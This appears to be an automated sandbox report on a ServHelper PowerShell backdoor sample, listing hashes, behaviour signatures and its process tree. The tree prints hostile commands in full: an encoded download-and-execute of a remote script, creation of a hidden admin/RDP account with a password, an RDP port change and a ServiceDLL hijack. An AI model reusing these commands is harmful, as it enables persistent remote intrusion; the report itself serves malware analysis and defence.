Analysis
-
max time kernel
123s -
max time network
86s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
18-08-2021 13:28
Static task
static1
Behavioral task
behavioral1
Sample
b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfa~.ps1
Resource
win7v20210410
Behavioral task
behavioral2
Sample
b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfa~.ps1
Resource
win10v20210410
General
-
Target
b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfa~.ps1
-
Size
2.6MB
-
MD5
35c34f487155cf7fc72c3146bfa1a016
-
SHA1
7ee148a4481dcbaba8e63235356f931243f30b37
-
SHA256
b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfacff1fd5d
-
SHA512
188daeb03aa63c289649f45ead6f7d66d20d9549ed673c4449bc5b353b992654de78d114f784bf7f582a12daf029084e21123fff57e5318188de650d7099c32b
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 10 916 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exepid process 1636 icacls.exe 952 icacls.exe 1144 icacls.exe 692 icacls.exe 1516 icacls.exe 576 icacls.exe 1628 icacls.exe 1672 takeown.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 1116 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 608 608 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1516 icacls.exe 576 icacls.exe 1628 icacls.exe 1672 takeown.exe 1636 icacls.exe 952 icacls.exe 1144 icacls.exe 692 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 21 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9afeeca9-f9d1-4549-b70a-7b8ebbdfb82e powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1e4a2880-eb41-4d2c-89ce-cdd9c1abcc64 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c018e57c-b040-47db-9360-e03c66e0ee9e powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RSDMQB1EMF4KCGCQMO7P.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6cb64870-33ce-450d-be1d-c4ca619df375 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8a1d74f7-1ec3-4e45-af92-957665a0bee9 powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c327661e-14f6-47b9-8ba4-e310b712f97d powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_33ffc59f-3ddc-4673-b136-3c406752aba9 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dc45e851-387d-4910-82a3-f7a99b3bad26 powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1d932505-2d6d-4598-8185-04b230f77765 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d5cbeda8-7fcf-4a30-8f08-2c98775d931c powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6f433178-8b5a-42c6-af2e-e69d70de3792 powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
Processes:
WMIC.exeWMIC.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 102c45dd3594d701 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1116 powershell.exe 528 powershell.exe 528 powershell.exe 916 powershell.exe 916 powershell.exe 824 powershell.exe 824 powershell.exe 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe 916 powershell.exe 916 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 464 608 608 608 608 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 1116 powershell.exe Token: SeDebugPrivilege 528 powershell.exe Token: SeDebugPrivilege 916 powershell.exe Token: SeDebugPrivilege 824 powershell.exe Token: SeRestorePrivilege 952 icacls.exe Token: SeAssignPrimaryTokenPrivilege 948 WMIC.exe Token: SeIncreaseQuotaPrivilege 948 WMIC.exe Token: SeAuditPrivilege 948 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 948 WMIC.exe Token: SeIncreaseQuotaPrivilege 948 WMIC.exe Token: SeAuditPrivilege 948 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1840 WMIC.exe Token: SeIncreaseQuotaPrivilege 1840 WMIC.exe Token: SeAuditPrivilege 1840 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1840 WMIC.exe Token: SeIncreaseQuotaPrivilege 1840 WMIC.exe Token: SeAuditPrivilege 1840 WMIC.exe Token: SeDebugPrivilege 916 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
powershell.execsc.exenet.execmd.execmd.exenet.exedescription pid process target process PID 1116 wrote to memory of 588 1116 powershell.exe csc.exe PID 1116 wrote to memory of 588 1116 powershell.exe csc.exe PID 1116 wrote to memory of 588 1116 powershell.exe csc.exe PID 588 wrote to memory of 388 588 csc.exe cvtres.exe PID 588 wrote to memory of 388 588 csc.exe cvtres.exe PID 588 wrote to memory of 388 588 csc.exe cvtres.exe PID 1116 wrote to memory of 528 1116 powershell.exe powershell.exe PID 1116 wrote to memory of 528 1116 powershell.exe powershell.exe PID 1116 wrote to memory of 528 1116 powershell.exe powershell.exe PID 1116 wrote to memory of 916 1116 powershell.exe powershell.exe PID 1116 wrote to memory of 916 1116 powershell.exe powershell.exe PID 1116 wrote to memory of 916 1116 powershell.exe powershell.exe PID 1116 wrote to memory of 824 1116 powershell.exe powershell.exe PID 1116 wrote to memory of 824 1116 powershell.exe powershell.exe PID 1116 wrote to memory of 824 1116 powershell.exe powershell.exe PID 1116 wrote to memory of 1672 1116 powershell.exe takeown.exe PID 1116 wrote to memory of 1672 1116 powershell.exe takeown.exe PID 1116 wrote to memory of 1672 1116 powershell.exe takeown.exe PID 1116 wrote to memory of 1636 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 1636 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 1636 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 952 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 952 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 952 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 1144 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 1144 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 1144 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 692 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 692 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 692 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 1516 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 1516 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 1516 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 576 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 576 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 576 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 1628 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 1628 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 1628 1116 powershell.exe icacls.exe PID 1116 wrote to memory of 1496 1116 powershell.exe reg.exe PID 1116 wrote to memory of 1496 1116 powershell.exe reg.exe PID 1116 wrote to memory of 1496 1116 powershell.exe reg.exe PID 1116 wrote to memory of 1312 1116 powershell.exe reg.exe PID 1116 wrote to memory of 1312 1116 powershell.exe reg.exe PID 1116 wrote to memory of 1312 1116 powershell.exe reg.exe PID 1116 wrote to memory of 968 1116 powershell.exe reg.exe PID 1116 wrote to memory of 968 1116 powershell.exe reg.exe PID 1116 wrote to memory of 968 1116 powershell.exe reg.exe PID 1116 wrote to memory of 1860 1116 powershell.exe net.exe PID 1116 wrote to memory of 1860 1116 powershell.exe net.exe PID 1116 wrote to memory of 1860 1116 powershell.exe net.exe PID 1860 wrote to memory of 1936 1860 net.exe net1.exe PID 1860 wrote to memory of 1936 1860 net.exe net1.exe PID 1860 wrote to memory of 1936 1860 net.exe net1.exe PID 1116 wrote to memory of 1572 1116 powershell.exe cmd.exe PID 1116 wrote to memory of 1572 1116 powershell.exe cmd.exe PID 1116 wrote to memory of 1572 1116 powershell.exe cmd.exe PID 1572 wrote to memory of 1840 1572 cmd.exe cmd.exe PID 1572 wrote to memory of 1840 1572 cmd.exe cmd.exe PID 1572 wrote to memory of 1840 1572 cmd.exe cmd.exe PID 1840 wrote to memory of 1920 1840 cmd.exe net.exe PID 1840 wrote to memory of 1920 1840 cmd.exe net.exe PID 1840 wrote to memory of 1920 1840 cmd.exe net.exe PID 1920 wrote to memory of 2008 1920 net.exe net1.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfa~.ps11⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bkor3f3f\bkor3f3f.cmdline"2⤵
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB9FC.tmp" "c:\Users\Admin\AppData\Local\Temp\bkor3f3f\CSC214DF0007E2C4E6FBC15224A8234D3C.TMP"3⤵PID:388
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:528 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:824 -
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1672 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1636 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:952 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1144 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:692 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1516 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:576 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1628 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f2⤵PID:1496
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f2⤵
- Modifies registry key
PID:1312 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f2⤵PID:968
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add2⤵
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵PID:1936
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr2⤵
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\system32\cmd.execmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\system32\net.exenet start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr5⤵PID:2008
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService2⤵PID:1160
-
C:\Windows\system32\cmd.execmd /c net start TermService3⤵PID:1512
-
C:\Windows\system32\net.exenet start TermService4⤵PID:832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService5⤵PID:700
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f2⤵PID:1336
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f2⤵PID:672
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:1668
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:1648
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:1336
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc j5uA500A /add1⤵PID:1144
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc j5uA500A /add2⤵PID:1204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc j5uA500A /add3⤵PID:1600
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:1088
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:2032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:316
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD1⤵PID:992
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD2⤵PID:2024
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD3⤵PID:1596
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:296
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1296
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc j5uA500A1⤵PID:1556
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc j5uA500A2⤵PID:1336
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc j5uA500A3⤵PID:672
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1532
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:948
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1628
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1232
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1964
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:916
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0714e1ae-4953-48a8-a4ef-a64baf5f0b2f
MD52d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0878cad9-bf04-42be-9efe-93e1eaa203aa
MD5a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0f147aa2-0884-4f1c-867a-2006a6f30166
MD56f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6113e00d-fd75-432e-a198-c6a96fa59fca
MD5d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8517c3c3-4f73-4a29-b647-c9873fcdd631
MD57f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8c0877fb-0c41-4715-be23-0883ce845408
MD5e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_af714b83-3b1b-4e6b-a9e4-590e5c08e9ad
MD5faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5cfcaf8a6b89d22c1addac508c1a132eb
SHA1a5e153b19a0d3f0b5f813b18b663587eb6108f8f
SHA256e06497087a92e380087a8256637a4754d8be995686a71c8dd2adb99f362031a5
SHA512c40e760cd89ffaa1d9c0f12d72a67b82e75ecbfe34596a8ba7aaa4eeb91ea65ba481ac3ca98aa337b18a1f2721cf760740ff0c78514a56c5e79b8b865332521c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD513eb3fef37fde0d54de09cc371e04992
SHA15d33193883a59ff9ef78a9cb794fefb795769843
SHA2562d5493a41beeaa831e62978faaede2826960e2bb773777b610b7d67a16434078
SHA51248953fcf1fd0c6e83d1b435c30cdf4d262f08897f5b70c57582f23fa4984d6a5970e7da07776579219cdfabd70e5917b265e729adef1ca0bfd912b0c8d176f2d
-
MD5
7d84d69cea5876aa4ea983b3c6b0ec7d
SHA1a6d5955e05095b3aa7423278eebc7b0b10a8a1a1
SHA256f57b8e47c256d8959d7a640b1f77b037b1556cf60ef5f9c75d75db39f9f78fdc
SHA512302f3fef0863d07b747fdae8efec1e745aab1c96df0827158794e933955eceb427e3be2840f8adb8fd34d0fd5857aad7fb8418de29e4808e4f294e730d39d771
-
MD5
a6352d8fa7e61d649a585757b1a49440
SHA1830458d7c451f84175c34968329861fd23c6ec8b
SHA256fc10cb712fc4fd7312f580338e9f4cc5d10f9f06b1d9a085c872acb2f6fb8a9e
SHA51290fde8555b16fd1f628eeeef1ea06cb6b11acff4efcd18abeaea1fdde3f58d96e20025f63c4f8246e95ad03d6e945be425614aa7f05bd0574b3816b1e61013f1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5104b5d12571a2cee16a7d67290b445c8
SHA1489d3958106f3012563b14239747d06580a58e8f
SHA2561192e7a86e92f69e22196ee3d37b181f6afd454b36c17ff7136d629ba537e55a
SHA512208ab19c405be96539328929b46b21f8c19e2cd81e7b45a3bd894489d68143cdd7915ef4a5af4a302037772c2c089e4ce51ae4393880e896031bc2b6ac859a9c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5104b5d12571a2cee16a7d67290b445c8
SHA1489d3958106f3012563b14239747d06580a58e8f
SHA2561192e7a86e92f69e22196ee3d37b181f6afd454b36c17ff7136d629ba537e55a
SHA512208ab19c405be96539328929b46b21f8c19e2cd81e7b45a3bd894489d68143cdd7915ef4a5af4a302037772c2c089e4ce51ae4393880e896031bc2b6ac859a9c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5104b5d12571a2cee16a7d67290b445c8
SHA1489d3958106f3012563b14239747d06580a58e8f
SHA2561192e7a86e92f69e22196ee3d37b181f6afd454b36c17ff7136d629ba537e55a
SHA512208ab19c405be96539328929b46b21f8c19e2cd81e7b45a3bd894489d68143cdd7915ef4a5af4a302037772c2c089e4ce51ae4393880e896031bc2b6ac859a9c
-
MD5
